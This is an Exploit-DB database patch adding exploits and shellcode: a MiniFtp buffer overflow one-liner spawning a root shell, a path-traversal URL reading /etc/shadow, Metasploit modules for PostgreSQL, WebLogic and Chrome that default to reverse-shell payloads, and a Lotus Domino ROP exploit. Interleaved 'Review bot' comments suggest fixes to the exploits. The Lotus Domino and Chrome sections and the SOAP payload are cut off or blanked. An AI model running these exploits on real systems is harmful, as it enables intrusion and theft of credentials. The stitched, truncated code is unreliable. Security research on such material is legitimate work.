From 5a4d21a1cfd5fe39c5be7890472de44e7d2436e9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 9 May 2019 05:02:02 +0000 Subject: [PATCH] DB: 2019-05-09 9 changes to exploits/shellcodes jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC) MiniFtp - 'parseconf_load_setting' Buffer Overflow Lotus Domino 8.5.3 - 'EXAMINE' Stack Buffer Overflow DEP/ASLR Bypass (NSA's EMPHASISMINE) Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit) PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit) Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit) NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass Linux/x86 - execve /bin/sh Shellcode (20 bytes) --- exploits/linux/local/46807.txt | 82 +++++ exploits/linux/webapps/46811.txt | 36 +++ exploits/multiple/remote/46813.rb | 250 ++++++++++++++++ exploits/multiple/remote/46814.rb | 172 +++++++++++ exploits/windows/dos/46810.py | 21 ++ exploits/windows/local/46805.py | 18 +- exploits/windows/remote/46808.py | 67 +++++ exploits/windows_x86/remote/46812.rb | 432 +++++++++++++++++++++++++++ files_exploits.csv | 7 + files_shellcodes.csv | 1 + shellcodes/linux_x86/46809.c | 31 ++ 11 files changed, 1108 insertions(+), 9 deletions(-) create mode 100644 exploits/linux/local/46807.txt create mode 100644 exploits/linux/webapps/46811.txt create mode 100755 exploits/multiple/remote/46813.rb create mode 100755 exploits/multiple/remote/46814.rb create mode 100755 exploits/windows/dos/46810.py create mode 100755 exploits/windows/remote/46808.py create mode 100755 exploits/windows_x86/remote/46812.rb create mode 100644 shellcodes/linux_x86/46809.c diff --git a/exploits/linux/local/46807.txt b/exploits/linux/local/46807.txt new file mode 100644 index 000000000..79d6b4f85 --- /dev/null +++ b/exploits/linux/local/46807.txt 
@@ -0,0 +1,82 @@ +# Exploit Title: MiniFtp parseconf_load_setting local-bufferoverflow (318 bytes) +# Google Dork: None +# Date: 11.04.2019 +# Exploit Author: strider +# Vendor Homepage: https://github.com/skyqinsc/MiniFtp +# Software Link: https://github.com/skyqinsc/MiniFtp +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 318 +------------------------------[Description]--------------------------------- + +This exploit spawns a shell with root privileges. The exploit will be written into the file miniftpd.conf + +vuln code: +void parseconf_load_setting(const char *setting){ +while(isspace(*setting)) setting++; + char key[128] = {0}, value[128] = {0}; + str_split(setting, key, value, '='); + if(strlen(value) == 0){ + fprintf(stderr, "missing value in config file for : %s\n", key); + exit(EXIT_FAILURE); + } +.... + +The given var settings is a *char and will be splitted into key and value key and value are both 128 char long and settings can be longer than 128 + 128 chars. this issue will not be checked and stored. This causes a buffer overflow. 
+
+after return it
+
+-----------------------------[Gdb-Peda Dump]---------------------------------
+[----------------------------------registers-----------------------------------]
+RAX: 0x0
+RBX: 0x48575250e7894851
+RCX: 0xffffffd480050f3b
+RDX: 0x90
+RSI: 0x7fffffffd3a0 --> 0x9090909090909090
+RDI: 0x55555555c854 ("download_max_rate")
+RBP: 0x50f3bc08348e689
+RSP: 0x7fffffffd460 --> 0x555555556860 (<_start>: xor ebp,ebp)
+RIP: 0x7fffffffd481 --> 0x9090909090909090
+R8 : 0xa ('\n')
+R9 : 0x7fffffffd4a0 --> 0x9090909090909090
+R10: 0x83a
+R11: 0x7ffff7891520 (<__strcmp_sse2_unaligned>: mov eax,edi)
+R12: 0x555555556860 (<_start>: xor ebp,ebp)
+R13: 0x7fffffffe200 --> 0x1
+R14: 0x0
+R15: 0x0
+EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+ 0x7fffffffd478: imul esi,DWORD PTR [rax+0x3d],0x90909090
+ 0x7fffffffd47f: nop
+ 0x7fffffffd480: nop
+=> 0x7fffffffd481: nop
+ 0x7fffffffd482: nop
+ 0x7fffffffd483: nop
+ 0x7fffffffd484: nop
+ 0x7fffffffd485: nop
+[------------------------------------stack-------------------------------------]
+0000| 0x7fffffffd460 --> 0x555555556860 (<_start>: xor ebp,ebp)
+0008| 0x7fffffffd468 --> 0x55555555b5b2 ("miniftpd.conf")
+0016| 0x7fffffffd470 ("max_per_ip=", '\220' ...)
+0024| 0x7fffffffd478 --> 0x90909090903d7069
+0032| 0x7fffffffd480 --> 0x9090909090909090
+0040| 0x7fffffffd488 --> 0x9090909090909090
+0048| 0x7fffffffd490 --> 0x9090909090909090
+0056| 0x7fffffffd498 --> 0x9090909090909090
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+0x00007fffffffd481 in ?? 
() +gdb-peda$ + + + -----------------------------[Exploit]--------------------------------------------- + +python -c "print 'max_per_ip=' + '\x90' * 278 + '\x48\x31\xc0\x48\x31\xd2\x50\x49\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x51\x48\x89\xe7\x50\x52\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05' + '\x80\xd4\xff\xff\xff\x7f'" > miniftpd.conf + + + -----------------------------[how to run]----------------------------- + +run the line above in a shell + +run MiniFtp in gdb and you got a shell \ No newline at end of file diff --git a/exploits/linux/webapps/46811.txt b/exploits/linux/webapps/46811.txt new file mode 100644 index 000000000..a47ce543d --- /dev/null +++ b/exploits/linux/webapps/46811.txt 
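Review bot: The header line `# Tested on: Debian 9 Stretch i386/ Kali Linux i386` does not match the rest of the write-up, which documents a 64-bit build: the GDB dump shows RAX/RIP/RSP with 0x7fffffff... stack addresses and the PoC line ends in an 8-byte return address. The Tested-on line should name the x86-64 environment actually used, or the dump should be replaced with one from an i386 run. The hard-coded return address also makes the PoC specific to that one gdb session, which the "how to run" section only implies; a sentence saying so would save readers a failed reproduction. The description would be more useful to maintainers with one line on the fix, e.g. `str_split must be bounded by the 128-byte key/value buffers` (hedged: str_split's body is not on this page).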
@@ -0,0 +1,36 @@
+# Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass
+# Google Dork: N/A
+# Date: 4/29/2019
+# Exploit Author: MobileNetworkSecurity
+# Vendor Homepage: https://www.netnumber.com/products/#data
+# Software Link: N/A
+# Version: Titan Master 7.9.1
+# Tested on: Linux
+# CVE : N/A
+# Type: WEBAPP
+
+*************************************************************************
+A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1.
+When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files.
+The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed.
+*************************************************************************
+
+Proof of Concept (PoC):
+
+http://X.X.X.X/drp?download=true&path=Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
+
+The vulnerable path parameter is base64 encoded where the equal sign replaced by the dollar sign.
+
+Original payload:
+Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
+
+Replaced dollar signs:
+Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw==
+
+Base64 decoded payload:
+//SYSTEM/system/trace?download=t&el=../../../../etc/shadow
+
+In the HTTP response you will receive the content of the file.
+
+*************************************************************************
+The issue has been fixed in the newer version of the software.
\ No newline at end of file
diff --git a/exploits/multiple/remote/46813.rb b/exploits/multiple/remote/46813.rb
new file mode 100755
index 000000000..23f9342f8
--- /dev/null
+++ b/exploits/multiple/remote/46813.rb
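Review bot: The closing line `The issue has been fixed in the newer version of the software.` does not name the fixed version, so a reader cannot tell whether a given Titan install is affected; state the version number if it is known, or say explicitly that it is unknown. The sentence `Since the webserver running with elevated privileges it is possible to download arbitrary files.` is missing its verb; `Because the web server runs with elevated privileges, files outside the trace directory can be read.` says the same thing and also makes the impact clearer. The CVE field says N/A; if an identifier was later assigned it belongs in the header.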
@@ -0,0 +1,250 @@ +\## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/postgres' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Postgres + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PostgreSQL COPY FROM PROGRAM Command Execution', + 'Description' => %q( + Installations running Postgres 9.3 and above have functionality which allows for the superuser + and users with 'pg_execute_server_program' to pipe to and from an external program using COPY. + This allows arbitrary command execution as though you have console access. + + This module attempts to create a new table, then execute system commands in the context of + copying the command output into the table. + + This module should work on all Postgres systems running version 9.3 and above. + + For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl + + For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp + Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload + or other customised command. + ), + 'Author' => [ + 'Jacob Wilkin' # Exploit Author of Module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2019-9193'], + ['URL', 'https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5'], + ['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. 
Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)' + ], + 'PayloadType' => 'cmd', + 'Platform' => %w(linux unix win osx), + 'Payload' => { + }, + 'Arch' => [ARCH_CMD], + 'Targets' => + [ + [ + 'Unix/OSX/Linux', { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { + 'Payload' => 'cmd/unix/reverse_perl' } + } + ],[ + 'Windows - PowerShell (In-Memory)', { + 'Platform' => 'windows', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { + 'Payload' => 'cmd/windows/powershell_reverse_tcp' } + } + ],[ + 'Windows (CMD)', + 'Platform' => 'win', + 'Arch' => [ARCH_CMD], + 'Payload' => { + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'adduser, generic' + } + } + ], + ], + 'DisclosureDate' => 'Mar 20 2019' + )) + + register_options([ + Opt::RPORT(5432), + OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]), + OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false]) + ]) + + deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE') + end + + # Return the datastore value of the same name + # @return [String] tablename for table to use with command execution + def tablename + datastore['TABLENAME'] + end + + def check + vuln_version? ? CheckCode::Appears : CheckCode::Safe + end + + def vuln_version? + version = postgres_fingerprint + return false unless version[:auth] + vprint_status version[:auth].to_s + version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first + if Gem::Version.new(version_full) >= Gem::Version.new('9.3') + return true + else + return false + end + end + + def login_success? 
+ status = do_login(username, password, database) + case status + when :noauth + print_error "#{peer} - Authentication failed" + return false + when :noconn + print_error "#{peer} - Connection failed" + return false + else + print_status "#{peer} - #{status}" + return true + end + end + + def execute_payload + # Drop table if it exists + query = "DROP TABLE IF EXISTS #{tablename};" + drop_query = postgres_query(query) + case drop_query.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_warning "#{peer} - Unable to execute query: #{query}" + return false + when :complete + print_good "#{peer} - #{tablename} dropped successfully" + else + print_error "#{peer} - Unknown" + return false + end + + # Create Table + query = "CREATE TABLE #{tablename}(filename text);" + create_query = postgres_query(query) + case create_query.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_warning "#{peer} - Unable to execute query: #{query}" + return false + when :complete + print_good "#{peer} - #{tablename} created successfully" + else + print_error "#{peer} - Unknown" + return false + end + + # Copy Command into Table + cmd_filtered = payload.encoded.gsub("'", "''") + query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';" + copy_query = postgres_query(query) + case copy_query.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_warning "#{peer} - Unable to execute query: #{query}" + if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/ + print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group' + return false + end + print_warning "#{peer} - Unable to execute query: #{query}" + return false + when :complete + print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)" + else + print_error "#{peer} - Unknown" + 
return false + end + + if datastore['DUMP_TABLE_OUTPUT'] + # Select output from table for debugging + query = "SELECT * FROM #{tablename};" + select_query = postgres_query(query) + case select_query.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_warning "#{peer} - Unable to execute query: #{query}" + return false + when :complete + print_good "#{peer} - #{tablename} contents:\n#{select_query}" + return true + else + print_error "#{peer} - Unknown" + return false + end + end + # Clean up table evidence + query = "DROP TABLE IF EXISTS #{tablename};" + drop_query = postgres_query(query) + case drop_query.keys[0] + when :conn_error + print_error "#{peer} - Connection error" + return false + when :sql_error + print_warning "#{peer} - Unable to execute query: #{query}" + return false + when :complete + print_good "#{peer} - #{tablename} dropped successfully(Cleaned)" + else + print_error "#{peer} - Unknown" + return false + end + end + + def do_login(user, pass, database) + begin + password = pass || postgres_password + result = postgres_fingerprint( + db: database, + username: user, + password: password + ) + + return result[:auth] if result[:auth] + print_error "#{peer} - Login failed" + return :noauth + + rescue Rex::ConnectionError + return :noconn + end + end + + def exploit + #vuln_version doesn't seem to work + #return unless vuln_version? + return unless login_success? + print_status("Exploiting...") + if execute_payload + print_status("Exploit Succeeded") + else + print_error("Exploit Failed") + end + postgres_logout if @postgres_conn + end +end \ No newline at end of file diff --git a/exploits/multiple/remote/46814.rb b/exploits/multiple/remote/46814.rb new file mode 100755 index 000000000..2fed80d01 --- /dev/null +++ b/exploits/multiple/remote/46814.rb 
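Review bot: In `execute_payload`, the `:sql_error` branch of the COPY query prints `Unable to execute query` twice, once before the superuser check and again after it; the second `print_warning` should be dropped. The message in that branch, `Insufficient permissions, User must be superuser or in pg_read_server_files group`, also disagrees with the module description, which names `pg_execute_server_program` as the role that allows COPY to/from a program; the message should name the same role as the description. In `vuln_version?`, `version_full` is taken from `scan(...).flatten.first` and passed straight to `Gem::Version.new`, so a banner that does not match the regex reaches it as nil; `return false unless version_full` before the comparison avoids that. `tablename` is interpolated unquoted into each statement; since it comes from an operator option that is tolerable, but a comment saying the name is not escaped would help the next maintainer.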
@@ -0,0 +1,172 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ', + 'Description' => %q{ + An unauthenticated attacker with network access to the Oracle Weblogic Server T3 + interface can send a malicious SOAP request to the interface WLS AsyncResponseService + to execute code on the vulnerable host. + }, + 'Author' => + [ + 'Andres Rodriguez - 2Secure (@acamro) ', # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2019-2725'], + ['CNVD-C', '2019-48814'], + ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'], + ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'] + ], + 'Privileged' => false, + 'Platform' => %w{ unix win solaris }, + 'Targets' => + [ + [ 'Unix', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} + ], + [ 'Windows', + 'Platform' => 'win', + 'Arch' => [ARCH_X64, ARCH_X86], + 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} + ], + [ 'Solaris', + 'Platform' => 'solaris', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, + 'Payload' => { + 'Space' => 2048, + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl telnet', + } + } + ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'WfsDelay' => 12 + }, + 'DisclosureDate' => 'Apr 23 2019')) + + register_options( + [ + Opt::RPORT(7001), + OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]), + OptString.new('WSPATH', [true, 'URL to 
AsyncResponseService', '/_async/AsyncResponseService']) + ] + ) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(datastore['WSPATH']), + 'method' => 'POST', + 'ctype' => 'text/xml', + 'headers' => {'SOAPAction' => '' } + ) + + if res && res.code == 500 && res.body.include?("env:Client") + vprint_status("The target returned a vulnerable HTTP code: /#{res.code}") + vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}") + Exploit::CheckCode::Vulnerable + elsif res && res.code != 202 + vprint_status("The target returned a non-vulnerable HTTP code") + Exploit::CheckCode::Safe + elsif res.nil? + vprint_status("The target did not respond in an expected way") + Exploit::CheckCode::Unknown + else + vprint_status("The target returned HTTP code: #{res.code}") + vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]") + Exploit::CheckCode::Unknown + end + end + + def exploit + print_status("Generating payload...") + case target.name + when 'Windows' + string0_cmd = 'cmd.exe' + string1_param = '/c' + shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false }) + when 'Unix','Solaris' + string0_cmd = '/bin/bash' + string1_param = '-c' + shell_payload = payload.encoded + end + + random_action = rand_text_alphanumeric(20) + random_relates = rand_text_alphanumeric(20) + + soap_payload = %Q|| + soap_payload << %Q|| + soap_payload << %Q|#{random_action}| + soap_payload << %Q|#{random_relates}| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|#{string0_cmd}| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|#{string1_param}| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|#{shell_payload.encode(xml: :text)}| + #soap_payload << %Q|#{xml_encode(shell_payload)}| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|| 
+ soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|| + soap_payload << %Q|| + + uri = normalize_uri(datastore['WSPATH']) + if uri.nil? + datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/" + end + + print_status("Sending payload...") + + begin + res = send_request_cgi( + 'uri' => uri, + 'method' => 'POST', + 'ctype' => 'text/xml', + 'data' => soap_payload, + 'headers' => {'SOAPAction' => '' } + ) + rescue Errno::ENOTCONN + fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.") + end + + if res.nil? + fail_with(Failure::Unreachable, "No response from host") + elsif res && res.code != 202 + fail_with(Failure::UnexpectedReply,"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202") + end + end +end \ No newline at end of file diff --git a/exploits/windows/dos/46810.py b/exploits/windows/dos/46810.py new file mode 100755 index 000000000..0b54ebdfd --- /dev/null +++ b/exploits/windows/dos/46810.py @@ -0,0 +1,21 @@ +#Exploit Title: jetAudio 8.1.7.20702 Basic - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-05-07 +#Vendor Homepage: http://www.jetaudio.com/ +#Software Link: http://www.jetaudio.com/download/ +#Tested Version: 8.1.7.20702 +#Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64 + +#Steps to produce the crash: +#1.- Run python code: jetAudio_8.1.7.20702.py +#2.- Open jetAudio.txt and copy content to clipboard +#2.- Open jetAudio +#3.- Select Menu > Basic Controls > Open URL... +#4.- In "Enter URL" Paste ClipBoard after "http://" +#5.- Click on "Ok" +#6.- Crashed + +cod = "\x41" * 5000 +f = open('jetAudio.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/46805.py b/exploits/windows/local/46805.py index d5823d20d..f66960153 100755 --- a/exploits/windows/local/46805.py +++ b/exploits/windows/local/46805.py 
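Review bot: In `exploit`, `uri = normalize_uri(datastore['WSPATH'])` is followed by `if uri.nil?`, which assigns `datastore['URIPATH']`; normalize_uri returns a string, so that branch is dead, and URIPATH is registered in `initialize` but never read anywhere else in the hunk, so either drop the option or use it when building the request. The failure message `Host did not responded with HTTP code #{res.code} instead of HTTP code 202` states the opposite of what happened; `Host responded with HTTP code #{res.code} instead of HTTP code 202` reads correctly. The `soap_payload` lines are empty on this page (the XML was dropped in rendering), so the request body itself could not be reviewed.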
@@ -16,14 +16,18 @@ # This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode. -# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E and this was an odd character set. +# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set. # calc.exe shellcode: # "\x31\xc9\x51\x68" # "\x63\x61\x6c\x63" # "\x54\xB8\xc7\x93" # "\xc2\x77\xff\xd0" + # Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe +# You would need to use logicla AND and the SUB EAX opcodes to get a value on the stack that could jump back to the A buffer, where there is +# much more room. Then you would need to align the stack with the value you need (not 0x012F3F4 as used below), and write upwards on the stack. +# You should have enough room for all of the logical AND and SUB EAX commands to get a full shell on the stack. # For zeroing out registers before manual shellcode zero = "\x25\x01\x01\x01\x01" # and eax, 0x01010101 @@ -37,12 +41,12 @@ restore += "\x51" # push ecx; (to get the value on the stack for the mov esp co # Stack alignment # Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack. -# AFter making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack. +# After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack. alignment = "\x54" # push esp alignment += "\x58" # pop eax; (puts the value of ESP into EAX) # Write these 3 sub values in normal format, since memory address, not instruction to be executed. -# 364D5555 364D5555 364E5555 +# 384D5555 364D5555 364E5555 alignment += "\x2d\x38\x4d\x55\x55" # sub eax, 0x384D5555 alignment += "\x2d\x36\x4d\x55\x55" # sub eax, 0x364D5555 alignment += "\x2d\x36\x4e\x55\x55" # sub eax, 0x364E5555 
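Review bot: The comment paragraph added in the `@@ -16,14 +16,18 @@` hunk has the typo `logicla AND`; `logical AND`. The same paragraph refers to `0x012F3F4`, which also appears in the second hunk's `Need to make ESP 0x012F3F4` line; that value has seven hex digits while the other addresses in the file have eight (`0x0012DC98`), so it appears to drop a digit and should be written out in full so the two comments can be checked against each other. The script these comments belong to continues outside the hunks.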
@@ -50,7 +54,7 @@ alignment += "\x50" # push eax alignment += "\x5c" # pop esp; (puts the value of eax back into esp) # calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers. -# 1st line = 2C552D14 01562D14 01562E16 +# 1st line = 2C552D14 01552D14 01562E16 shellcode = zero shellcode += "\x2d\x14\x2d\x55\x2c" # sub eax, 0x2C552D14 shellcode += "\x2d\x14\x2d\x55\x01" # sub eax, 0x01562D14 @@ -80,9 +84,7 @@ shellcode += "\x50" # push eax # We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall, # We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!) -# Here are the 3 values: 3F3F2711 3F3F2711 3F3F2811 -# For some reason the application changed some of my math. 3F3F2811 was supposed to be -# 403F3F2811 and so I changed it by 1 hex byte to get the CC (was getting CD) +# Here are the 3 values: 403F2711 3F3F2711 3F3F2811 move = zero move += "\x2d\x40\x3f\x27\x11" # sub eax, 0x3F3F2711 move += "\x2d\x3f\x3f\x27\x11" # sub eax, 0x3F3F2711 @@ -109,8 +111,6 @@ payload += shellcode payload += move payload += "\x43" * (5000-len(payload)) -print payload - f = open('pwn.txt', 'w') f.write(payload) f.close() \ No newline at end of file diff --git a/exploits/windows/remote/46808.py b/exploits/windows/remote/46808.py new file mode 100755 index 000000000..9b838459c --- /dev/null +++ b/exploits/windows/remote/46808.py 
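Review bot: The corrected header comment `# 1st line = 2C552D14 01552D14 01562E16` in the `@@ -50,7 +54,7 @@` hunk now disagrees with the inline comment two lines below it, `# sub eax, 0x01562D14`, on the bytes `\x2d\x14\x2d\x55\x01`; read little-endian those bytes encode 0x01552D14, so the inline comment is the stale one and should become `# sub eax, 0x01552D14`. The `@@ -80,9 +84,7 @@` hunk has the same problem: the header now reads `403F2711 3F3F2711 3F3F2811` but the first `move` line is still commented `# sub eax, 0x3F3F2711`. Note also that the alignment block earlier in the file writes its comments in the opposite byte order (`\x38\x4d\x55\x55` is commented as 0x384D5555), so the file should settle on one convention for how immediates are written in comments.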
@@ -0,0 +1,67 @@ +########################################################## +# # +# Here is a working version of the NSA's EMPHASISMINE # +# for IMAP Server Lotus Domino 8.5.3 FP0 # +# DEP/ASLR bypass # +# # +# Replace breakpoints with msfvenom payload # +# (ALPHANUMERIC) # +# I love you Alison Thompson OAM @ThirdWaveORG # +# Author: Charles Truscott @r0ss1n1 # +# # +########################################################### + + +import base64 +import struct +import socket +import time + +rop_and_roll = struct.pack(' ebx +rop_and_roll += struct.pack(' edx +rop_and_roll += struct.pack(' ecx +rop_and_roll += struct.pack(' 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86', + 'Description' => %q{ + This exploit takes advantage of a use after free vulnerability in Google + Chrome 72.0.3626.119 running on Windows 7 x86. + The FileReader.readAsArrayBuffer function can return multiple references to the + same ArrayBuffer object, which can be freed and overwritten with sprayed objects. + The dangling ArrayBuffer reference can be used to access the sprayed objects, + allowing arbitrary memory access from Javascript. This is used to write and + execute shellcode in a WebAssembly object. + The shellcode is executed within the Chrome sandbox, so you must explicitly + disable the sandbox for the payload to be successful. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Clement Lecigne', # discovery + 'István Kurucsai', # Exodus Intel + 'timwr', # metasploit module + ], + 'References' => [ + ['CVE', '2019-5786'], + ['URL', 'https://github.com/exodusintel/CVE-2019-5786'], + ['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'], + ['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'], + ['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'], + ], + 'Arch' => [ ARCH_X86 ], + 'Platform' => 'windows', + 'DefaultTarget' => 0, + 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, + 'Targets' => [ [ 'Automatic', { } ] ], + 'DisclosureDate' => 'Mar 21 2019')) + end + + def on_request_uri(cli, request) + print_status("Sending #{request.uri}") + if request.uri =~ %r{/exploit.html$} + html = %Q^ + + + + + + + + ^ + send_response(cli, html) + elsif request.uri =~ %r{/worker.js$} + send_response(cli, 'onmessage = function (msg) { }') + else + uripath = datastore['URIPATH'] || get_resource + uripath += '/' unless uripath.end_with? '/' + html = %Q^ + + + + + + + ^ + send_response(cli, html) + end + end + +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 11fba4ea6..25a2fabd3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6410,6 +6410,7 @@ id,file,description,date,author,type,platform,port
 46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows,
 46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
 46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows,
+46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10455,6 +10456,7 @@ id,file,description,date,author,type,platform,port
 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
 46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows,
 46805,exploits/windows/local/46805.py,"Admin Express 1.2.5.485 - 'Folder Path' Local SEH Alphanumeric Encoded Buffer Overflow",2019-05-07,"Connor McGarr",local,windows,
+46807,exploits/linux/local/46807.txt,"MiniFtp - 'parseconf_load_setting' Buffer Overflow",2019-05-08,strider,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
